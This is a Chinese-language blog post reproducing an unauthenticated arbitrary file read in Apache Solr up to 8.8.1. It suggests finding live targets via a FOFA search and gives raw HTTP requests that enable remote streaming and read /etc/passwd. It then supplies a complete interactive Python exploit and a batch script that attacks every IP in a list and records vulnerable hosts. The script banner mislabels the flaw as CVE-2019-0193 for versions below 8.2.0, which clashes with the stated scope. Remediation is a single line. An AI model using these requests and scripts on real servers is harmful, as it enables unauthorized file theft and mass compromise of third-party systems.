Apache Solr 任意文件读取漏洞
一.漏洞描述
Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。
二.影响版本
Apache Solr <= 8.8.1
三.漏洞复现
1.搭环境
下载Solr
https://mirrors.ukfast.co.uk/sites/ftp.apache.org/lucene/solr/8.8.1/solr-8.8.1.tgz
也可以使用fofa大法,搜索 app=“Solr”
访问目标
2.获取core的信息
访问:
http://ip:8983/solr/admin/cores?indexInfo=false&wt=json
获取关键词:acdbcategories
]
3.发送请求
使用burp发送以下请求包,ip要对应:
GET /solr/acdbcategories/config HTTP/1.1
Host: ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type:application/json
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 82
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
结果:
4.文件读取
也是使用burp发送请求包:
GET /solr/acdbcategories/debug/dump?param=ContentStreams HTTP/1.1
Host: ip:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 29
stream.url=file:///etc/passwd
结果如下,成功读取到/etc/passwd中的信息:
5.脚本使用
import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():
print('+------------------------------------------')
print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m')
print('+ \033[36m使用格式: python3 CVE-2019-0193.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')
print('+ \033[36mFile >>> 文件名称或目录 \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
response = requests.request("GET", url=core_url, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
return core_name
except:
print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
sys.exit(0)
def POC_2(target_url, core_name):
vuln_url = target_url + "/solr/" + core_name + "/config"
headers = {
"Content-type":"application/json"
}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
if "This" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
sys.exit(0)
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, core_name, File_name):
vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'stream.url=file://{}'.format(File_name)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
if "No such file or directory" in response.text:
print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
else:
print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
core_name = POC_1(target_url)
POC_2(target_url, core_name)
while True:
File_name = str(input("\033[35mFile >>> \033[0m"))
POC_3(target_url, core_name, File_name)
运行结果:
6.批量测试目标是否存在
与其相同目录下新建一个1.txt文件,在1.txt中存放需要测试的url,并运行脚本,会生成url.txt的文件,文件中就是存在漏洞的url。
import requests
import sys
import random
import re
import base64
import time
from lxml import etree
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
a=[]
def title():
print('+------------------------------------------')
print('+ \033[34mVersion: Apache Solr < 8.2.0 \033[0m')
print('+ \033[36m使用格式: python3 poc.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')
print('+ \033[36mFile >>> 文件名称或目录 \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
response = requests.request("GET", url=core_url, timeout=2)
core_name = list(json.loads(response.text)["status"])[0]
print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
return core_name
except:
print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
return 1
def POC_2(target_url, core_name):
vuln_url = target_url + "/solr/" + core_name + "/config"
headers = {
"Content-type":"application/json"
}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
print("\033[36m[o] 正在准备文件读取...... \033[0m".format(target_url))
if "This" in response.text and response.status_code == 200:
print("\033[32m[o] 目标 {} 可能存在漏洞 \033[0m".format(target_url))
else:
print("\033[31m[x] 目标 {} 不存在漏洞\033[0m".format(target_url))
return 1
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
def POC_3(target_url, core_name, File_name):
vuln_url = target_url + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = 'stream.url=file://{}'.format(File_name)
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)
if "No such file or directory" in response.text:
print("\033[31m[x] 读取{}失败 \033[0m".format(File_name))
print(response.text)
else:
if 'root' in response.text:
print(target_url)
with open('./url.txt','a') as f:
f.write(target_url+'\n')
print("\033[36m[o] 响应为:\n{} \033[0m".format(json.loads(response.text)["streams"][0]["stream"]))
except Exception as e:
print("\033[31m[x] 请求失败 \033[0m", e)
if __name__ == '__main__':
title()
with open('1.txt', 'r', encoding='utf-8') as f:
g=f.read()
a=re.findall('\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}[:]\d+',g)
print(a)
for i in a:
if 'http' in i:
target_url = str(i)
else:
target_url = 'http://'+str(i)
print(target_url)
core_name = POC_1(target_url)
print(core_name)
if str(core_name)=='1':
print(22)
continue
b=POC_2(target_url, core_name)
if str(b)=='1':
continue
File_name = str('/etc/passwd')
POC_3(target_url, core_name, File_name)
四、修复建议
将 Solr 端口仅对内网开放,并配置访问策略
无修复版本(好像是官方拒绝修复)
- 欢迎大家评论交流